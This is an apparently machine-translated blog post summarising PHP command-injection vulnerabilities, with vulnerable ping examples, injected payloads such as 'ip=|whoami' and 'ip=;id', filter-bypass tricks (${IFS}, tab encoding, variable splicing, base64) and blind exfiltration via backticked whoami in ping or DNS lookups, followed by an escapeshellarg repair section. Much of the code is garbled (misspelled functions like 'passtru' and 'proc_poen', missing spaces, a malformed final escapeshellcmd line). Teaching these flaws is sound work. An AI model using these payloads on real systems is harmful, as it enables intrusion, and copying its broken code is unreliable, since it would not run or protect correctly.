Command Execution Vulnerability summary

Posted by wigz01 on Fri, 14 Jan 2022 10:07:20 +0100

Command Execution Vulnerability

  • Principle some functions of the application program call functions that can execute system commands. If the parameters are controlled by the user, it is possible to splice commands into normal functions through malicious connectors, so as to execute system commands at will

php common command execution functions and operators

system function

Used to execute external programs and display output

string system ( string $command [,int $return_var ])
<?php system('whoami');?>

Output root after execution

exec function

Used to execute an external program

string exec(string $command[,array &$output[,ubt &$return_var]])
<?php echo exec('whoami');?>

When echo is added during execution, the result of whoami will be output

shell_exec function

Execute the command through the shell environment and return the complete output as a string

string shell_exec(string $cmd)
<?php echo shell_exec('whoami');?>

When echo is added during execution, the result of whoami will be output

passthu function

Used to execute external programs and display the original output

void passthru(string $command[,int &$return_var])
<?php passtru('whoami');?>

After execution, the default output is root

popen function

Open process file pointer

resource popen (string $command,string $mode)
<?php popen("touch test.txt","r")?>

After the code is executed, test. Will be created in the current folder Txt file

proc_poen function

Pointer to open process file

resource proc_popen (string $cmd,string $descriptorspec,array&$pipes[, string $cwd[,array $other_potions]])
print stream_get_contents($pipes[1]);

Output results after execution

back quote

The single quotation mark is a php execution operator. php will try to execute the contents in the single quotation mark as a shell command and return the output information

<?php echo `whoami`;?>
Output after execution`root`

Command execution vulnerability under Windows

Command connector

&Command connector

&If the previous statement is false, the statement after & is executed
&If the previous statement is true, it will be executed

&&Command connector

&&If the previous statement is false, an error will be reported directly and the subsequent statement will not be executed
&&If the previous statement is true, it will be executed before and after

|Command connector

|If the previous statement is false, an error will be reported directly and the subsequent statement will not be executed
|If the previous statement is true, execute the following statement

||Command connector

||If the preceding statement is false, execute the following statement
||If the previous statement is true, only the statements before 𞓜 will be executed, and the statements after 𞓜 will not be executed



	system("ping ".$ip);

Normal input? ip= will return the result of ping
Enter ip=|whoami
It will return the information of the current user. Of course, you can only trust your net user and other sensitive operations about user account management

Command execution vulnerability under Linux

Command connector

; Command connector

Semicolon; Make multiple commands execute in sequence before and after execution
For example, execute id under Linux; id, the first and second id commands will execute and output the current user information

&Command connector

&The function is to make the command run after it, so that multiple commands can be executed at the same time
For example, execute the commands before and after ID & whoamI to output user information

&&Command connector

The function is to execute the following command if the previous command is executed successfully

|Command connector

Taking the output of the previous command as the input of the subsequent command will be executed before and after, but only the execution results of the subsequent command will be displayed

||Command connector

If the front command is executed successfully, the rear command will not be executed. If the front command fails, the rear command will be executed



			$ip=$_GET['ip']	;
			system("ping -c 3".$ip);		

Code call system function input? ip=;id returns user information after successful execution. Of course, other linux commands can also be executed

Command execution bypass

Bypass space filtering

${IFS} bypass

${IFS} is a special environment variable of the shell. It is an internal Yu separator under Linux. The value stored in $IFS can be a space, tab, line break or other custom symbols

			system("ping -c 3".ip)


Return commandexec PHP source code content

$IFS bypass

Usage is similar to ${IFS}

Tab bypass

%09 is a tab URL encoding. You can bypass space filtering by% 09 instead of spaces;cat%09commandexec.php

{} bypass;{cat,commandexec.php}

< bypass;cat<commandexec.php

Bypass keyword filtering

Variable splicing bypass

Linux supports variable assignment, which can bypass the filtering principle through splicing;a=c;b=at;$a$b commandexec.php

Null variable bypass;ca${x}t commandexec.php

System variable bypass

${shellops} is a system variable. You can use the character splicing of the system variable to bypass the filtering


For example, c\a\t bypasses cat command filtering

Wildcard bypass

*Represents 0 to more than one character
? Represents an arbitrary character
The character range in [] represents any character in the character range


Can use



shell bounce bypass

When using shell rebound to attack, if there is filtering, you can bypass the filtering and execute commands through wildcards

base64 encoding bypass

For example, the base64 encoding of id is aWQ = and then decoded by basa64 -d to bypass the filtering
as;`echo "aWQ="
base64 -d`

expr and awk bypass

Get characters from other files and construct commands through expr and awk commands
For example, the content of the fff file is the string wdnmd Com through the following command

expr substr$(awk NR=1 fff)1  1

You can get the first character W stored in the file

Command execution without echo

If there is command execution but no echo, you can bounce back to vps through shell bounce, and then execute the command through vps. If you cannot bounce back, you can also obtain the execution result through DNS pipeline resolution
Get user name under Linux

ping -c 1 `whoami`

Under Windows
Get computer name

for /F %x in ('whoami') do start

user name

for /F "delims-\tokens=2" %i in ('whoami') do ping -n 1 %

Execute the following command on the website to obtain the user name root

curl "http: //'whoami'

Vulnerability repair

1. Disable_ Sensitive functions in functions

2. Function filtering

Escape hellarg function

The escape hellarg function transcodes a string into a parameter that can be used in a shell command to
Filter parameters in commands

string escape shellarg (string $arg)

Function adds a single quotation mark to a string and can reference or escape any existing string
Single quotation marks, which can directly pass a string into the shell function and ensure that it is safe
Repair cases

			$ip=$_GET['ip']	;
			system("ping -c 3".escapeshellarg($ip));		

escapeshellcmd function

shell metacharacters can be escaped and filtered

string escapeshellcmd(string $command)

For malicious command characters in the string that may deceive the shell, the escape function ensures that the data entered by the user is escaped before being transferred to the system function or executing the operator
The function adds a backslash between characters

			$ip=$_GET['ip']	;
			system(escapeshellcmd("ping -c 3")"ping -c 3".$ip);